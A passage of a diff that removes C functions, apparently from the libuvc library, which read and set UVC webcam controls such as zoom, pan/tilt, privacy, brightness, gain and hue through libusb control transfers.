-uvc_error_t uvc_set_iris_abs(uvc_device_handle_t *devh, uint16_t iris) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(iris, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_IRIS_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the IRIS_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] iris_rel TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_iris_rel(uvc_device_handle_t *devh, uint8_t* iris_rel, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_IRIS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *iris_rel = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the IRIS_RELATIVE control.
- * @param devh UVC device handle
- * @param iris_rel TODO
- */
-uvc_error_t uvc_set_iris_rel(uvc_device_handle_t *devh, uint8_t iris_rel) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = iris_rel;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_IRIS_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ZOOM_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] focal_length TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_zoom_abs(uvc_device_handle_t *devh, uint16_t* focal_length, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ZOOM_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *focal_length = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ZOOM_ABSOLUTE control.
- * @param devh UVC device handle
- * @param focal_length TODO
- */
-uvc_error_t uvc_set_zoom_abs(uvc_device_handle_t *devh, uint16_t focal_length) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(focal_length, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ZOOM_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ZOOM_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] zoom_rel TODO
- * @param[out] digital_zoom TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_zoom_rel(uvc_device_handle_t *devh, int8_t* zoom_rel, uint8_t* digital_zoom, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[3];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ZOOM_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *zoom_rel = data[0];
-    *digital_zoom = data[1];
-    *speed = data[2];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ZOOM_RELATIVE control.
- * @param devh UVC device handle
- * @param zoom_rel TODO
- * @param digital_zoom TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_zoom_rel(uvc_device_handle_t *devh, int8_t zoom_rel, uint8_t digital_zoom, uint8_t speed) {
-  uint8_t data[3];
-  uvc_error_t ret;
-
-  data[0] = zoom_rel;
-  data[1] = digital_zoom;
-  data[2] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ZOOM_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PANTILT_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] pan TODO
- * @param[out] tilt TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_pantilt_abs(uvc_device_handle_t *devh, int32_t* pan, int32_t* tilt, enum uvc_req_code req_code) {
-  uint8_t data[8];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PANTILT_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *pan = DW_TO_INT(data + 0);
-    *tilt = DW_TO_INT(data + 4);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PANTILT_ABSOLUTE control.
- * @param devh UVC device handle
- * @param pan TODO
- * @param tilt TODO
- */
-uvc_error_t uvc_set_pantilt_abs(uvc_device_handle_t *devh, int32_t pan, int32_t tilt) {
-  uint8_t data[8];
-  uvc_error_t ret;
-
-  INT_TO_DW(pan, data + 0);
-  INT_TO_DW(tilt, data + 4);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PANTILT_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PANTILT_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] pan_rel TODO
- * @param[out] pan_speed TODO
- * @param[out] tilt_rel TODO
- * @param[out] tilt_speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_pantilt_rel(uvc_device_handle_t *devh, int8_t* pan_rel, uint8_t* pan_speed, int8_t* tilt_rel, uint8_t* tilt_speed, enum uvc_req_code req_code) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PANTILT_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *pan_rel = data[0];
-    *pan_speed = data[1];
-    *tilt_rel = data[2];
-    *tilt_speed = data[3];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PANTILT_RELATIVE control.
- * @param devh UVC device handle
- * @param pan_rel TODO
- * @param pan_speed TODO
- * @param tilt_rel TODO
- * @param tilt_speed TODO
- */
-uvc_error_t uvc_set_pantilt_rel(uvc_device_handle_t *devh, int8_t pan_rel, uint8_t pan_speed, int8_t tilt_rel, uint8_t tilt_speed) {
-  uint8_t data[4];
-  uvc_error_t ret;
-
-  data[0] = pan_rel;
-  data[1] = pan_speed;
-  data[2] = tilt_rel;
-  data[3] = tilt_speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PANTILT_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ROLL_ABSOLUTE control.
- * @param devh UVC device handle
- * @param[out] roll TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_roll_abs(uvc_device_handle_t *devh, int16_t* roll, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ROLL_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roll = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ROLL_ABSOLUTE control.
- * @param devh UVC device handle
- * @param roll TODO
- */
-uvc_error_t uvc_set_roll_abs(uvc_device_handle_t *devh, int16_t roll) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(roll, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ROLL_ABSOLUTE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the ROLL_RELATIVE control.
- * @param devh UVC device handle
- * @param[out] roll_rel TODO
- * @param[out] speed TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_roll_rel(uvc_device_handle_t *devh, int8_t* roll_rel, uint8_t* speed, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_ROLL_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roll_rel = data[0];
-    *speed = data[1];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the ROLL_RELATIVE control.
- * @param devh UVC device handle
- * @param roll_rel TODO
- * @param speed TODO
- */
-uvc_error_t uvc_set_roll_rel(uvc_device_handle_t *devh, int8_t roll_rel, uint8_t speed) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  data[0] = roll_rel;
-  data[1] = speed;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_ROLL_RELATIVE_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the PRIVACY control.
- * @param devh UVC device handle
- * @param[out] privacy TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_privacy(uvc_device_handle_t *devh, uint8_t* privacy, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_PRIVACY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *privacy = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the PRIVACY control.
- * @param devh UVC device handle
- * @param privacy TODO
- */
-uvc_error_t uvc_set_privacy(uvc_device_handle_t *devh, uint8_t privacy) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = privacy;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_PRIVACY_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the DIGITAL_WINDOW control.
- * @param devh UVC device handle
- * @param[out] window_top TODO
- * @param[out] window_left TODO
- * @param[out] window_bottom TODO
- * @param[out] window_right TODO
- * @param[out] num_steps TODO
- * @param[out] num_steps_units TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_window(uvc_device_handle_t *devh, uint16_t* window_top, uint16_t* window_left, uint16_t* window_bottom, uint16_t* window_right, uint16_t* num_steps, uint16_t* num_steps_units, enum uvc_req_code req_code) {
-  uint8_t data[12];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_DIGITAL_WINDOW_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *window_top = SW_TO_SHORT(data + 0);
-    *window_left = SW_TO_SHORT(data + 2);
-    *window_bottom = SW_TO_SHORT(data + 4);
-    *window_right = SW_TO_SHORT(data + 6);
-    *num_steps = SW_TO_SHORT(data + 8);
-    *num_steps_units = SW_TO_SHORT(data + 10);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the DIGITAL_WINDOW control.
- * @param devh UVC device handle
- * @param window_top TODO
- * @param window_left TODO
- * @param window_bottom TODO
- * @param window_right TODO
- * @param num_steps TODO
- * @param num_steps_units TODO
- */
-uvc_error_t uvc_set_digital_window(uvc_device_handle_t *devh, uint16_t window_top, uint16_t window_left, uint16_t window_bottom, uint16_t window_right, uint16_t num_steps, uint16_t num_steps_units) {
-  uint8_t data[12];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(window_top, data + 0);
-  SHORT_TO_SW(window_left, data + 2);
-  SHORT_TO_SW(window_bottom, data + 4);
-  SHORT_TO_SW(window_right, data + 6);
-  SHORT_TO_SW(num_steps, data + 8);
-  SHORT_TO_SW(num_steps_units, data + 10);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_DIGITAL_WINDOW_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the REGION_OF_INTEREST control.
- * @param devh UVC device handle
- * @param[out] roi_top TODO
- * @param[out] roi_left TODO
- * @param[out] roi_bottom TODO
- * @param[out] roi_right TODO
- * @param[out] auto_controls TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_digital_roi(uvc_device_handle_t *devh, uint16_t* roi_top, uint16_t* roi_left, uint16_t* roi_bottom, uint16_t* roi_right, uint16_t* auto_controls, enum uvc_req_code req_code) {
-  uint8_t data[10];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_CT_REGION_OF_INTEREST_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *roi_top = SW_TO_SHORT(data + 0);
-    *roi_left = SW_TO_SHORT(data + 2);
-    *roi_bottom = SW_TO_SHORT(data + 4);
-    *roi_right = SW_TO_SHORT(data + 6);
-    *auto_controls = SW_TO_SHORT(data + 8);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the REGION_OF_INTEREST control.
- * @param devh UVC device handle
- * @param roi_top TODO
- * @param roi_left TODO
- * @param roi_bottom TODO
- * @param roi_right TODO
- * @param auto_controls TODO
- */
-uvc_error_t uvc_set_digital_roi(uvc_device_handle_t *devh, uint16_t roi_top, uint16_t roi_left, uint16_t roi_bottom, uint16_t roi_right, uint16_t auto_controls) {
-  uint8_t data[10];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(roi_top, data + 0);
-  SHORT_TO_SW(roi_left, data + 2);
-  SHORT_TO_SW(roi_bottom, data + 4);
-  SHORT_TO_SW(roi_right, data + 6);
-  SHORT_TO_SW(auto_controls, data + 8);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_CT_REGION_OF_INTEREST_CONTROL << 8,
-    uvc_get_camera_terminal(devh)->bTerminalID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the BACKLIGHT_COMPENSATION control.
- * @param devh UVC device handle
- * @param[out] backlight_compensation device-dependent backlight compensation mode; zero means backlight compensation is disabled
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_backlight_compensation(uvc_device_handle_t *devh, uint16_t* backlight_compensation, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_BACKLIGHT_COMPENSATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *backlight_compensation = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the BACKLIGHT_COMPENSATION control.
- * @param devh UVC device handle
- * @param backlight_compensation device-dependent backlight compensation mode; zero means backlight compensation is disabled
- */
-uvc_error_t uvc_set_backlight_compensation(uvc_device_handle_t *devh, uint16_t backlight_compensation) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(backlight_compensation, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_BACKLIGHT_COMPENSATION_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the BRIGHTNESS control.
- * @param devh UVC device handle
- * @param[out] brightness TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_brightness(uvc_device_handle_t *devh, int16_t* brightness, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_BRIGHTNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *brightness = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the BRIGHTNESS control.
- * @param devh UVC device handle
- * @param brightness TODO
- */
-uvc_error_t uvc_set_brightness(uvc_device_handle_t *devh, int16_t brightness) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(brightness, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_BRIGHTNESS_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the CONTRAST control.
- * @param devh UVC device handle
- * @param[out] contrast TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_contrast(uvc_device_handle_t *devh, uint16_t* contrast, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_CONTRAST_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *contrast = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the CONTRAST control.
- * @param devh UVC device handle
- * @param contrast TODO
- */
-uvc_error_t uvc_set_contrast(uvc_device_handle_t *devh, uint16_t contrast) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(contrast, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_CONTRAST_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the CONTRAST_AUTO control.
- * @param devh UVC device handle
- * @param[out] contrast_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_contrast_auto(uvc_device_handle_t *devh, uint8_t* contrast_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_CONTRAST_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *contrast_auto = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the CONTRAST_AUTO control.
- * @param devh UVC device handle
- * @param contrast_auto TODO
- */
-uvc_error_t uvc_set_contrast_auto(uvc_device_handle_t *devh, uint8_t contrast_auto) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = contrast_auto;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_CONTRAST_AUTO_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the GAIN control.
- * @param devh UVC device handle
- * @param[out] gain TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_gain(uvc_device_handle_t *devh, uint16_t* gain, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_GAIN_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *gain = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the GAIN control.
- * @param devh UVC device handle
- * @param gain TODO
- */
-uvc_error_t uvc_set_gain(uvc_device_handle_t *devh, uint16_t gain) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(gain, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_GAIN_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the POWER_LINE_FREQUENCY control.
- * @param devh UVC device handle
- * @param[out] power_line_frequency TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_power_line_frequency(uvc_device_handle_t *devh, uint8_t* power_line_frequency, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_POWER_LINE_FREQUENCY_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *power_line_frequency = data[0];
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the POWER_LINE_FREQUENCY control.
- * @param devh UVC device handle
- * @param power_line_frequency TODO
- */
-uvc_error_t uvc_set_power_line_frequency(uvc_device_handle_t *devh, uint8_t power_line_frequency) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  data[0] = power_line_frequency;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_POWER_LINE_FREQUENCY_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the HUE control.
- * @param devh UVC device handle
- * @param[out] hue TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_hue(uvc_device_handle_t *devh, int16_t* hue, enum uvc_req_code req_code) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
-    UVC_PU_HUE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data)) {
-    *hue = SW_TO_SHORT(data + 0);
-    return UVC_SUCCESS;
-  } else {
-    return ret;
-  }
-}
-
-
-/** @ingroup ctrl
- * @brief Sets the HUE control.
- * @param devh UVC device handle
- * @param hue TODO
- */
-uvc_error_t uvc_set_hue(uvc_device_handle_t *devh, int16_t hue) {
-  uint8_t data[2];
-  uvc_error_t ret;
-
-  SHORT_TO_SW(hue, data + 0);
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_SET, UVC_SET_CUR,
-    UVC_PU_HUE_CONTROL << 8,
-    uvc_get_processing_units(devh)->bUnitID << 8 | devh->info->ctrl_if.bInterfaceNumber,
-    data,
-    sizeof(data),
-    0);
-
-  if (ret == sizeof(data))
-    return UVC_SUCCESS;
-  else
-    return ret;
-}
-
-/** @ingroup ctrl
- * @brief Reads the HUE_AUTO control.
- * @param devh UVC device handle
- * @param[out] hue_auto TODO
- * @param req_code UVC_GET_* request to execute
- */
-uvc_error_t uvc_get_hue_auto(uvc_device_handle_t *devh, uint8_t* hue_auto, enum uvc_req_code req_code) {
-  uint8_t data[1];
-  uvc_error_t ret;
-
-  ret = libusb_control_transfer(
-    devh->usb_devh,
-    REQ_TYPE_GET, req_code,
